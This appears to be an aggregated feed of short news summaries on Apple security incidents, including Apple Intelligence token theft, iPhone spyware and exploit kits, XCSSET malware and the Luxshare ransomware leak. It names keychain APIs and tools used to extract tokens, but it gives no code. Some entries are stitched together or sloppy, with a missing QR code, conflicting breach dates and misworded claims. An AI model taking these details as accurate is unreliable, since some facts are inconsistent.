Apple Intelligence Token Theft Vulnerability Exposes Privacy Risks in macOS 26.0 Researchers from The Ohio State University have uncovered critical vulnerabilities in Apple’s Apple Intelligence, a generative AI service integrated into macOS 26.0 (Tahoe), which could allow attackers to steal and reuse authentication tokens. The flaws undermine the system’s privacy-focused design, enabling unauthorized access to AI services and potential denial-of-service (DoS) attacks. ### How the System Works (and Fails) Apple Intelligence relies on Private Cloud Compute (PCC), a framework that processes complex AI requests in the cloud while prioritizing user anonymity. The system uses a two-tiered token system under the Privacy Pass protocol: - A Token Granting Token (TGT), a long-lived credential issued after verifying the device as authentic Apple hardware. - One-Time Tokens (OTTs), single-use credentials redeemed for individual AI requests. To protect privacy, traffic routes through an Oblivious HTTP (OHTTP) relay, masking IP addresses and metadata from Apple. However, researchers found that PCC nodes do not enforce TGT validation by default, despite Apple’s documentation suggesting it was reserved for future abuse prevention. ### Key Vulnerabilities 1. Plaintext Token Storage – TGTs and OTTs are stored in the login keychain in unencrypted form, accessible to any application with standard user permissions. 2. Bearer Token Design – Tokens are not tied to specific devices, meaning they can be reused by attackers if stolen. Users have no revocation mechanism, leaving compromised tokens valid for days. 3. Weak Keychain Access Controls – Malware can extract tokens via the SecItemCopyMatching API or the `/usr/bin/security` tool, often with minimal user interaction (e.g., a single "Allow" prompt). ### The Serpent Attack Researchers developed "Serpent", a proof-of-concept exploit demonstrating how attackers could: - Extract tokens from a victim’s Mac by tricking users into granting keychain access. - Exfiltrate and reuse tokens on an attacker-controlled device, impersonating the victim. - Bypass rate limits – A banned device could regain access by importing stolen tokens. - Launch DoS attacks – By redeeming a victim’s OTTs without sending actual requests, attackers could exhaust their daily quota, triggering a "service unavailable" error. Because the OHTTP relay hides IP addresses, Apple cannot trace malicious activity, making detection nearly impossible. The attack could even enable automated AI service resale on non-Apple platforms like Linux. ### Apple’s Response & Partial Fixes Apple assigned CVE-2025-43509 and issued a patch in macOS 26.2, moving tokens from the login keychain to the iCloud keychain, which requires stricter kernel-level permissions. However, researchers demonstrated that kernel extensions or memory debugging could still bypass these protections, and Apple is developing further mitigations. The findings highlight a fundamental tension in Apple’s design: anonymity without hardware binding creates inherent security risks. While the current fix raises the bar for attackers, researchers argue that cryptographic hardware binding is necessary for a robust solution.

A zero-click attack leveraging a newly disclosed Messages vulnerability (CVE-2025-43200) has infected the iPhones of two European journalists with Paragon's Graphite mercenary spyware. The attack, which occurred in January and early February 2025, exploited a logic issue triggered when processing a maliciously crafted photo or video shared via an iCloud Link. The vulnerability was fixed in iOS 18.3.1, released on February 10. Apple acknowledged that this issue may have been exploited in a sophisticated attack against specific targeted individuals. Users who have upgraded to iOS 18.3.1 and later versions are safe from this attack. High-risk users are advised to enable Lockdown Mode and reboot their devices daily to minimize the attack surface.

The discovery of the new LightSpy spyware version targeting iPhones marks a significant security concern for Apple. This sophisticated and destructive malware compromises iOS devices, stealing sensitive information and hindering device functionality by blocking the boot-up process. The spyware utilizes old vulnerabilities to exfiltrate private data from widely-used apps, captures audio, and has a wide range of destructive capabilities including deleting user files and wiping browser history. The potential losses for individual users are substantial, ranging from personal privacy breaches to financial and data loss, while Apple's reputation for security may also suffer as a result.

Apple's move to incorporate 'Apple Intelligence' with OpenAI's ChatGPT into iOS has raised security concerns, particularly from Elon Musk who labeled it as 'creepy spyware.' Despite the claims of a privacy breach, Apple ensures high privacy standards with their Private Cloud Compute system, designed to process core tasks on-device, and mask data origins during cloud-based AI computations. This architecture aims to prevent unauthorized data access, setting a new standard in AI privacy. However, potential threats to privacy and security cannot be overlooked, as data can be susceptible to interception or misuse when cloud processing is involved.

Advanced iPhone Exploit Kit "Coruna" Traces Back to U.S. Defense Contractor, Spreads Globally A sophisticated iOS exploit toolkit called Coruna has become a focal point in cybersecurity circles after evidence linked its origins to L3Harris, a U.S. defense contractor, before falling into the hands of Russian intelligence and Chinese cybercriminals. The case underscores the risks of government-grade hacking tools leaking into broader cybercrime and espionage operations. Google’s Threat Intelligence Group revealed that Coruna leverages 23 exploits across five attack chains, targeting iPhones running iOS 13 through 17.2.1 via watering-hole attacks. A single visit to a compromised website can trigger remote code execution, sandbox escape, and kernel compromise, enabling attackers to steal data, spy on victims, and drain cryptocurrency wallets. Originally deployed in highly targeted operations by an unnamed government client of a commercial surveillance vendor, Coruna was later repurposed by Russian state hackers against Ukrainian users and, subsequently, by a Chinese cybercrime group for financial theft. This progression reflects a common pattern: elite zero-day exploits, once leaked, rapidly enter underground markets as "second-hand" tools. TechCrunch reported that two former employees of L3Harris’ hacking division, Trenchant, identified Coruna’s artifacts and internal naming conventions, suggesting the toolkit was developed in-house and sold exclusively to the U.S. government and Five Eyes allies. Separately, researchers at iVerify assessed that Coruna was likely built by a U.S. government contractor, though they did not confirm attribution. The timeline aligns with a 2023 insider theft case involving Peter Williams, Trenchant’s former general manager, who was sentenced for stealing and selling eight offensive tools including those targeting iOS to Russian exploit broker Operation Zero for $1.3 million. U.S. prosecutors warned these tools could compromise millions of devices. Operation Zero, now sanctioned by the U.S. Treasury, has ties to Russian intelligence and unauthorized buyers, facilitating Coruna’s spread to state-backed hackers and cybercriminals. Coruna’s codebase also overlaps with exploits used in Operation Triangulation, a 2023 campaign disclosed by Kaspersky that targeted iPhones, including those within Russia. Shared modules such as Photon, Gallium, and Plasma suggest a connection between the two frameworks, reinforcing concerns about the proliferation of high-end iOS exploits.

In a sophisticated cyber incident, limited attacks involving a new variant of macOS malware, identified as XCSSET, have been reported. Discovered by Microsoft Threat Intelligence, this malware variant has altered Xcode projects and exhibited advanced obfuscation, persistence mechanisms, and infection methods. While initially activated in 2022, the XCSSET threat has continued to evolve, challenging cybersecurity efforts with its enhanced techniques for encoding payloads and making it difficult to trace and understand the intent of obfuscated module names. Persistent attacks have been orchestrated using methods such as 'zshrc' to execute files in new shell sessions and 'dock' to replace legitimate Launchpad apps with malicious ones. The impact of this malware predominantly threatens the security of developers' environments and the integrity of software supply chains, potentially resulting in the compromise of data and the disruption of developer operations.

Apple fired Rivos, a startup firm for allegedly stealing its sensitive proprietary information of the firm through some of its employees. The former employees of Apple stole gigabytes of sensitive SoC specifications and design files at the request of Rivos as part of the recruiting process. According to the reports the startup wants to design chips that will compete with them. Apple filed the complaint to recover its trade secrets, to protect them from further disclosure.

The customer data of Apple Inc. and Meta Platforms Inc. was leaked to hackers who impersonates themselves as law enforcement officials in a forged emergency data requests. The leaked information included the basic subscriber details, such as a customer’s address, phone number and IP address. The company soon blocked the known compromised accounts from making requests and worked with law enforcement to respond to incidents involving suspected fraudulent requests.

On February 28, 2022, the Maine Office of the Attorney General reported a data breach involving Apple Inc. that occurred on November 29, 2021, due to insider wrongdoing. The breach affected a total of 12 individuals, including 1 resident, and potentially compromised financial account numbers or credit/debit card numbers in combination with security codes, access codes, passwords, or PINs.

RansomHub Breach Exposes Apple’s Unreleased Product Designs from Luxshare In December, ransomware group RansomHub infiltrated Luxshare, a key Apple supplier, stealing sensitive CAD drawings, engineering designs, and prototype details for unreleased products, including future iPhones, Apple Watches, AirPods, and Vision Pro models. The attackers are now threatening to leak the data unless a ransom is paid. The breach, which occurred on December 15, was first disclosed by the hackers on the dark web, who accused Luxshare of concealing the incident. RansomHub claims to possess 2D/3D CAD files, PCB designs, repair processes, shipping timelines, and employee details including names, roles, and email addresses of staff working on confidential projects. A sample of the leaked data, reviewed by Cybernews, appears to confirm the authenticity of the stolen files. Luxshare, a critical player in Apple’s supply chain since 2020, manufactures iPhones, Apple Watches, AirPods, MacBook accessories, and the Vision Pro. The stolen data includes highly detailed .prt files, which reveal precise dimensions and specifications of prototype components information that could be invaluable to competitors. Neither Apple nor Luxshare has publicly acknowledged the breach, but the incident raises concerns about the security of Apple’s tightly guarded product development process ahead of major 2024 launches. The exposure of such sensitive designs could compromise Apple’s competitive edge and supply chain integrity.

Luxshare Hit by RansomHub Ransomware Attack, Threatening Apple, Nvidia, and LG Data Leaks Luxshare, a major Apple supplier responsible for assembling iPhones, AirPods, Apple Watches, and Vision Pro devices, has allegedly fallen victim to a ransomware attack by the cybercriminal group RansomHub. The attackers claim to have stolen sensitive data, including confidential project details, product designs, and personal information of employees, threatening to leak it unless a ransom is paid. The breach, which reportedly occurred in December 2023, includes data spanning 2019 to 2025, such as 3D CAD models, circuit board designs, repair processes, and shipping timelines for Apple and other Luxshare clients. The attackers also allege access to engineering documentation from Nvidia, LG, Tesla, and Geely, raising concerns about corporate espionage and supply chain risks. RansomHub, a ransomware-as-a-service (RaaS) operation, has been highly active in 2024, targeting nearly 500 victims at a rate of nearly one per day. The group employs remote encryption tools and exploits unprotected systems to evade detection. If confirmed, the breach could allow competitors to reverse-engineer products, manufacture counterfeits, or exploit hardware vulnerabilities in Apple devices. Luxshare, a Shenzhen-based electronics giant with over 230,000 employees and $37 billion in revenue, plays a critical role in Apple’s supply chain. The leaked data also includes personal identifiable information (PII) of employees, such as names, job titles, and work emails. As of now, Luxshare, Apple, and Nvidia have not publicly confirmed the breach, though Cybernews researchers believe the leaked samples appear legitimate. The incident underscores the growing threat of supply chain attacks and the potential for ransomware groups to disrupt major tech manufacturers.

There is a flaw in the latest version of iOS that could fool iPhone users into visiting a malicious website rather than a safe one. With iOS 11 Apple introduced a new feature to its built-in camera app, giving users the ability to scan QR codes and access their content (such as URLs). In other words, just pointing the camera app on your iOS device at the QR code below will invite you to visit www.welivesecurity.com but it will show an unsuspicious-looking domain in the notification, but take an unwitting user to an entirely different URL in Safari.

Mac Users Targeted in iCloud Ransomware Attack Several Mac users have reported being locked out of their devices after hackers exploited stolen iCloud credentials to remotely activate Find My Mac and demand a $50 Bitcoin ransom. The attacks, first highlighted by MacRumors, involve threat actors using compromised usernames and passwords to lock victims’ computers, displaying a ransom message in chatspeak. Apple has confirmed the incidents, noting that affected users must visit an Apple Store with proof of identity to regain access. Alternatively, victims face either paying the ransom with no guarantee of recovery or performing a hard reset, which erases all data. The breach highlights a broader security issue: hackers likely obtained credentials through phishing scams, fake virus alerts, or weak passwords. While Apple has not disclosed the scale of the attacks, the incident underscores vulnerabilities in account security, particularly for users without two-factor authentication (2FA) enabled. Disabling Find My Mac may reduce risk for unaffected users.

Mac owners who use the open source Transmission BitTorrent, hit by rare ransomware Attack, Spread via Transmission BitTorrent App. The attackers infected app’s official website, encrypted customers documents and data files. The attackers demanded a one bitcoin (approximately $400) ransom be paid and restore almost data’s safe.

Unauthorized third parties had tampered the Apple’s Xcode software, a code library used by developers of Mac OS X and iOS applications, and published it on the net. Some developers downloaded it and used it to create their apps and uploaded the apps on Apple App Store. These apps could communicate with third parties details of your iOS devices and attempted to phish for iCloud passwords. Apple removed the tainted apps and started working with the developers to make sure they were using the proper version of Xcode to rebuild their apps.